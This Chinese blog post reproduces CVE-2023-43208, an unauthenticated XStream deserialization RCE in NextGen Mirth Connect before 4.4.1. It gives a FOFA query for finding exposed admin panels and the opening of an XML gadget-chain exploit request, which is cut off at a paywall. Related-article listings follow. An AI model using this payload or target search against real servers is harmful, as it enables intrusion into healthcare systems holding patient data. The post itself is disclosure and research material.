NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)

已于 2024-05-24 11:29:11 修改
阅读量387 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-05-24 11:29:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139170252
版权

0x01 产品简介

NextGen Mirth Connect是是美国NextGen公司的一个医疗集成引擎,主要用于医疗领域的系统集成和数据交换,支持多种协议和标准。

0x02 漏洞概述

NextGen Mirth Connect 4.4.1之前版本存在远程代码执行漏洞,未经身份认证的攻击者可利用该漏洞远程执行代码。

0x03 影响范围

NextGen NextGen Mirth Connect < 4.4.1

0x04 复现环境

FOFA:title="Mirth Connect Administrator"

0x05 漏洞复现

PoC

POST /api/users HTTP/1.1
Host: your-ip
X-Requested-With: OpenAPI
Content-Type: application/xml

<sorted-set>
    <string>abcd</string>
        <dynamic-proxy>
            <interface>java.lang.Comparable</interface>
            <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
              <target class="org.apache.commons.collections4.functors.Chai
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
nextgen-mirthconnect-39-user-guide(mirth3.9使用文档).pdf
04-30
mirth3.9使用文档
CISA紧急通告:NextGen Healthcare Mirth Connect正遭攻击
smellycat000的专栏
05-21 150
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士美国网络安全和基础设施安全局 (CISA) 将影响 NextGen Healthcare Mirth Connect 的一个漏洞新增至必修清单,说明该漏洞已遭活跃利用。该漏洞的编号是CVE-2023-43208,是由另外一个严重漏洞CVE-2023-37679(CVSS评分 9.8)的补丁不完整导致的未认证远程代码执行漏洞。该漏洞的详情率先由 H...
网络安全日报 2023年10月30日
Galaxy_0的博客
10-30 383
研究人员在周四发布的报告中,揭露了一种高度复杂的、持续多年的间谍框架,它与美国国家安全局(NSA)相关的恶意软件有相似之处。报告描述了一个名为StripedFly的框架,它能够截屏、获取系统版本信息、窃取网站登录用户名、密码和其他自动填充数据、访问Wi-Fi网络信息(包括密码)、录制麦克风音频,并识别和窃取敏感文件。StripedFly依赖于一个定制的EternalBlue漏洞利用程序——一种2016年泄露到网上的NSA恶意软件——来感染受害者。
Mirth Connect 源码用eclipse启动
weixin_43899418的博客
01-10 665
准备工作 Mirth Connect源码, GitHub源码地址:(网络较慢,难受) https://github.com/nextgenhealthcare/connect/tree/3.12.x Gitee码云上的源码地址:(速度还可以) https://gitee.com/dingdongnigedingdong/Mirthconnect/tree/3.12.x/ eclipse2019版 1.拉取源码 自己用git拉取源码到自己的电脑即可;拉取时注意选择最新的3.12的版本; 2.导入ecli
绿盟科技网络安全威胁周报2017.09 请关注MSIE Edge任意代码执行漏洞CVE-2017-0037
weixin_33691817的博客
09-01 317
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-09,绿盟科技漏洞库本周新增41条,其中高危16条。本次周报建议大家关注Microsoft Internet Explorer/Edge任意代码执行漏洞CVE-2017-0037 。攻击者通过精心构造的网页可以达到远程代码执行的目的。目前尚无任何补丁,建议大家暂时停用IE和Edge。 Micro...
绿盟科技网络安全威胁周报2017.12 关注fastjson远程代码执行漏洞 漏洞细节以及利用工具已经曝光...
weixin_33720956的博客
09-01 728
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-12,绿盟科技漏洞库本周新增44条,其中高危12条。本次周报建议大家关注fastjson远程代码执行。目前漏洞细节已经披露,可导致大规模对此漏洞的利用。强烈建议用户检查自己使用的fastjson是否为受影响的版本,如果是,请尽快升级。 焦点漏洞 fastjson远程代码执行 NSFOCUS ...
打开科研新视野:bcbio-nextgen —— 一体化的生物信息学解决方案
gitblog_00071的博客
05-15 280
打开科研新视野:bcbio-nextgen —— 一体化的生物信息学解决方案 项目地址:https://gitcode.com/bcbio/bcbio-nextgen 项目介绍 在生命科学研究中,面对海量的基因测序数据,高效的分析工具至关重要。bcbio-nextgen 是一款强大的、社区驱动的开放源代码生物信息学平台,它提供了从序列处理到变异检测、RNA-seq 分析等一系列流程化的解决方案。这...
[siggraph19]NextGen geometry processing--mesh shader
安柏霖的专栏
11-02 1414
siggraph 19 上nvidia公布了mesh shader的扩展,在19年10.28日的Directx12的dev preview放出了mesh shader的扩展。 一句话用微软的话来说就是:the next generation of GPU geometry processing capability。 当然便于理解,我们一句话概括,就是将compute shader来代替之前的g...
欧美国家ADS-B设备装配进展
孙权打的博客
08-23 1124
图 1:Garmin的ADS-B In设备,ADS-B In 将附近的飞机目标描绘为带箭头的航迹线展示在显示屏中 商业航空公司能够通过自动相关监视广播(ADS-B)接收和显示航班的交通信息。2010年,美国联邦航空局FAA规定,在美国大部分管制空域飞行的所有飞机都必须在2020年1月前通过ADS-B传输其位置。自截止日期以来,几乎所有商用飞机commercial airlines——据美国联邦航空局2021年2月统计,超过6700架都已满足要求。据估计,90%或更多的公务机business jets也这样做
connect:瑞士医疗整合军刀
05-13
NextGen Connect集成引擎(以前为Mirth Connect) 1.有用的链接 开发人员指南 示例和教程 FHIR扩展指南 讨论区 松弛通道松弛注册 2.一般信息 下一代解决方案使命 NextGen Solutions帮助美国许多最大,最受尊敬的...
NextGen Connect 3.7 User Guide.pdf
02-28
Mirth Connect是一个开源的跨平台HL7接口引擎,可通过多种传输方式在系统和应用程序之间双向发送HL7消息。
@Mopoid-NextGen-Tutorial.rar_it_nextgen
09-24
Mopoid documentation about it-how was writen
mirth connect 用户手册4.1.0
09-02
Mirth Connect 是一款由 NextGen Healthcare 开发的医疗健康信息交换平台,旨在实现医疗健康信息的互操作性和互连性。下面是基于 Mirth Connect 用户手册4.1.0 的知识点总结: 1. 医疗健康信息交换平台的重要性:...
等保测评和安全运维
weixin_64392888的博客
06-11 668
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1411
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 429
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 966
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
《软件定义安全》之八:软件定义安全案例
大龄IT民工
06-13 1149
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
cve-2018-6910
08-08
CVE-2018-6910是关于WordPress插件NextGEN Gallery的一个安全漏洞。NextGEN Gallery是一款非常流行的WordPress插件,用于创建和管理图集。该漏洞存在于NextGEN Gallery版本2.2.50及之前版本中。 这个漏洞允许未经授权的攻击者通过特殊构造的请求来删除任意文件或目录,并可能导致服务器拒绝服务(DoS)攻击。具体而言,攻击者可以发送恶意请求并在目标服务器上删除任意文件或目录,从而破坏或删除重要数据。此外,攻击者还可以通过触发服务器端的错误来导致服务不可用。 为了利用这个漏洞,攻击者只需向目标服务器发送特制的请求,其中包含一个名为"path"的参数,该参数指定要删除的文件或目录的路径。该插件没有对传递的路径参数进行正确的验证和过滤,从而导致攻击者可以执行任意文件删除操作。 为了防止这个漏洞的利用,建议用户升级他们的NextGEN Gallery插件至最新版本,并定期检查插件的更新。升级至最新版本会修复这个漏洞,并提供更好的安全性和性能。 除此之外,网站管理员还可以采取其他安全措施来保护他们的网站。例如,限制对插件目录的写入权限、定期备份重要文件、应用安全补丁和更新等。此外,注意审查和验证来自未受信任的源的插件和主题,以减少遭遇类似漏洞的风险。 总之,CVE-2018-6910是一个影响NextGEN Gallery插件的安全漏洞,允许攻击者删除任意文件或目录。通过升级插件、限制权限和采取其他安全措施,网站管理员可以减少潜在的风险和避免遭受攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值